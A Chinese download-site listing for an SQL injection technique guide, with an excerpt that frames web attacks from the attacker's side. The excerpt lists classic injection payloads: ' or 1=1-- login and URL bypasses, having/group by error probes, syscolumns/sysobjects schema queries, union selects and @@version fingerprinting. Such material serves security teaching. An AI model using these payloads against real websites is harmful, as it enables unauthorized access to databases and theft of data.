[www.ed2k.online]下載基地為您提供軟件、遊戲、圖書、教育等各種資源的ED2K電驢共享下載和MAGNET磁力鏈接下載。
設為首頁
加入收藏
首頁 圖書資源 軟件資源 游戲資源 教育資源 其他資源
 電驢下載基地 >> 图书资源 >> 計算機與網絡 >> 《SQL注射技術總結文檔》
《SQL注射技術總結文檔》
下載分級 图书资源
資源類別 計算機與網絡
發布時間 2017/7/14
大       小 -
《SQL注射技術總結文檔》 簡介:   導讀: 簡介: 1、簡介當你看到一個服務器只開了80端口,這在一定程度上說明管理員把系統的補丁做的很好,我們所要做最有效的攻擊則也應該轉向WEB攻擊。SQL注射是最常用的攻擊方式。你攻擊 簡介: 1、簡介 當你看到一個服務器只開了80端口,這在一定程度上說明管理員把系統的補丁做的很好,我們所要做最有效的攻擊則也應該轉向WEB攻
電驢資源下載/磁力鏈接資源下載:
全選
"《SQL注射技術總結文檔》"介紹
  導讀: 簡介: 1、簡介當你看到一個服務器只開了80端口,這在一定程度上說明管理員把系統的補丁做的很好,我們所要做最有效的攻擊則也應該轉向WEB攻擊。SQL注射是最常用的攻擊方式。你攻擊 簡介:


1、簡介
當你看到一個服務器只開了80端口,這在一定程度上說明管理員把系統的補丁做的很好,我們所要做最有效的攻擊則也應該轉向WEB攻擊。SQL注射是最常用的攻擊方式。你攻擊WEN系統(ASP,PHP,JSP,CGI等)比去攻擊系統或者其他的系統服務要簡單的多。
SQL注射是通過頁面中的輸入來欺騙使得其可以運行我們構造的查詢或者別的命令,我們知道在WEB上面有很多供我們輸入參數的地方,比如用戶名、密碼或者E_mail。
2、漏洞測試
最開始我們應該從最簡單的來試:
- Login:' or 1=1--
- Pass:' or 1=1--
- http://website/index.asp?id=' or 1=1--
還有下面這樣的方式:
- ' having 1=1--
- ' group by userid having 1=1--
- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--
- ' union select sum(columnname) from tablename--
3、收集信息
- ' or 1 in (select @@version)--
- ' union all select @@version--
上面就可以得到系統的版本和補丁信息。
相關資源:

免責聲明:本網站內容收集於互聯網,本站不承擔任何由於內容的合法性及健康性所引起的爭議和法律責任。如果侵犯了你的權益,請通知我們,我們會及時刪除相關內容,謝謝合作! 聯系信箱:[email protected]

Copyright © 電驢下載基地 All Rights Reserved